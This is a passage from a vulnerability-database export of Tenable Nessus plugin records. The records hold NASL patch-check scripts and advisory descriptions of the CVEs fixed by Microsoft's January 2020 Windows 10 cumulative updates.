: Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534306');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534306])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T22:48:27", "description": "The remote Windows host is missing security update 4528760.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the Windows Subsystem for Linux handles files.\n An attacker who successfully exploited the vulnerability could execute code with elevated privileges.\n (CVE-2020-0636)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0624, CVE-2020-0642)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code- signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in- the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632, CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - A denial of service vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4528760: Windows 10 Version 1903 and Windows 10 Version 1909 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0611", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0616", "CVE-2020-0620", "CVE-2020-0623", "CVE-2020-0624", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0636", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4528760.NASL", "href": "https://www.tenable.com/plugins/nessus/132857", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132857);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0616\",\n \"CVE-2020-0620\",\n \"CVE-2020-0623\",\n \"CVE-2020-0624\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0636\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4528760\");\n script_xref(name:\"MSFT\", value:\"MS20-4528760\");\n\n script_name(english:\"KB4528760: Windows 10 Version 1903 and Windows 10 Version 1909 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4528760.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Subsystem for Linux handles files.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated privileges.\n (CVE-2020-0636)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0624, CVE-2020-0642)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\");\n # https://support.microsoft.com/en-us/help/4528760/windows-10-update-kb4528760\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?027d37ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4528760.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4528760');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4528760])\n ||\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18363\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4528760])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T22:48:43", "description": "The remote Windows host is missing security update 4534276.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in Windows 10 when third party filters are called during a password update. Successful exploitation of the vulnerability could allow a user to make use of a blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632, CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code- signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in- the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. (CVE-2020-0601)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534276: Windows 10 Version 1709 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0611", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0621", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534276.NASL", "href": "https://www.tenable.com/plugins/nessus/132860", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132860);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4534276\");\n script_xref(name:\"MSFT\", value:\"MS20-4534276\");\n\n script_name(english:\"KB4534276: Windows 10 Version 1709 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534276.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n 